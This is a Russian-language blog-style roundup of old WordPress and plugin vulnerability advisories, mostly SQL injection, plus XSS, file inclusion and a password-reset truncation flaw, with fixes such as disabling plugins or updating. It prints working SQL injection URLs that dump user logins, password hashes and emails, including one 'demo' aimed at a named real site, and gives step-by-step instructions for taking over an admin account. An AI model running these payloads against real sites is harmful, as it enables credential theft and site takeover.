Уязвимость Wordpress плагина Photoracer 1.0
В плагине Photoracer 1.0 найдена уязвимость типа SQL-injection, которая позволяет злоумышленнику выполнить любые команды в базе данных Wordpress блога.
Данная уязвимость обеспечивается недостаточной обработкой данных, которые передаются скрипту viewimg.php. С помощью такого запроса, можно выполнять команды к базе данных:
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
Рекомендуется отключить плагин, до исправления ошибки или выхода новой версии.
Уязвимость в Wordpress плагине FireStats 1.6.1
Из-за неправильной обработки входных данных, злоумышленник может воспользоваться уязвимостью в плагине FireStats и выполнить любой сценарий с правами веб-сервера.
Передав имя файла, плагину, с помощью аргументов адресной строки, злоумышленник может передать имя файла, которое находится где-то на сервере.
Пример запроса: http://www.TARGET.com/[path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de]
Защита от перебора паролей в Wordpress
Для того, чтобы обезопасить свой блог, от взлома путем перебора паролей, необходимо установить ограничение количества неправильных логинов, в этом случае бот или человек, который задумает подобрать пароль к Вашему блогу, после определенного количества неправильных логинов, будет забанен на определенное время.
Сделать это можно очень легко, достаточно просто скачать и установить . (как установить плагин)
- Плагин позволяет настроить количество неправильных логинов, до того как забанить пользователя.
- Плагин показывает пользователю сколько попыток осталось
- Плагин показывает пользователю сколько времени осталось до следующей возможности логина
- Отправляет уведомление администратору о том, что были попытки подобрать пароль
Устанавливайте плагин и делайте ваш Wordpress блог более безопасным.
Уязвимость Wordpress плагина fMoblog 2.1
Найдена уязвимость в Wordpress плагине fMoblog, которая позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных Wordpress.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id».
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,gr
oup_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group
_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
Уязвимость в Wordpress MU < 2.7
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за ошибки в функции choose_primary_blog при проверке HOST заголовка.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Для устранения уязвимости рекомендуется обновить Wordpress MU до версии 2.7
.
Уязвимость Wordpress плагина WP-Forum 1.7.8
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «thread» сценарием forum_feed.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL]
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
Уязвимость в Wordpress ниже 2.6.3
Если вы еще не обновили свой блог, до версии 2.7, которая на данный момент является финальной стабильной версией Wordpress, возможно некоторые уязвимости в старых версиях Wordpress заставят вас задуматься об этом.
Jeremias Reith опубликовал уязвимость на сервис которая при удачном использовании позволяет злоумышленнику, получить доступ к панели администрирования вашего блога.
Данная уязвимость исправлена в версии Wordpress 2.6.5, но желательно обновлять блог, до последней версии Wordpress 2.7
Уязвимости в плагинах Media Holder и e-Commerce
Найдены уязвимости в Wordpress-плагинах Media Holder и E-Commerce.
На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога.
Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп.
Плагин e-Commerce используется для создания интернет-магазина на основе вашего Wordpress-блога.
Уязвимость в плагине Wordpress Media Holder связана с ошибкой обработки данных при работе с базой MySQL вашего блога. Эксплоит можно просмотреть .
Уязвимость в плагине Wordpress e-Commerce связана с неправильной обработкой загружаемых на сервер файлов. Эксплоит можно посмотреть .
Если вы используете один из этих плагинов в своем блоге, отключите их до тех пор, пока появится обновление, которое исправляет данные уязвимости.
Для борьбы с уязвимостями которые используют базу данных MySQL в Wordpress-блоге, возможно будет полезно изменение префикса таблиц, при установке блога, либо если блог уже установлен со стандартным префиксом wp_ воспользуйтесь плагином, который изменяет префиксы таблиц, в уже существующем блоге.
Уязвимость SQL-инъекции в плагине WP Comment Remix
Найдена уязвимость в плагине Wordpress - WP Comment Remix. Плагин предназначается для улучшения функций комментирования. Позволяет добавить функции цитирования и ответа на комментарии.
На эту уязвимость уже написан эксплоит, который позволяет извлечь из блога-жертвы очень много, важных данных, таких как:
- Настройки блога и активные плагины
- Список пользователей блога
- Список администраторов блога
Сам эскплоит можно скачать .
Для закрытия уязвимости, либо отключите плагин, либо смените префикс таблиц, в базе данных вашего блога со стандартного wp_ на что-то типа dsf342h_
Уязвимость усечения данных в SQL Wordpress 2.6.1
Найдена новая уязвимость в Wordpress 2.6.1 которая заключается в ошибке усечения данных в базе SQL.
- Идем по ссылке server.com/wp-login.php?action=register
- Регистрируемся как пользователь "admin x" и Ваш email
- Логин выглядит как admin[55 пробелов]х
- После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword
- В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.
- Получаем письмо с ссылкой на сброс пароля, сбрасываем пароль администратора. Новый пароль прийдет на email, но правда уже не на Ваш, а на email администратора блога.
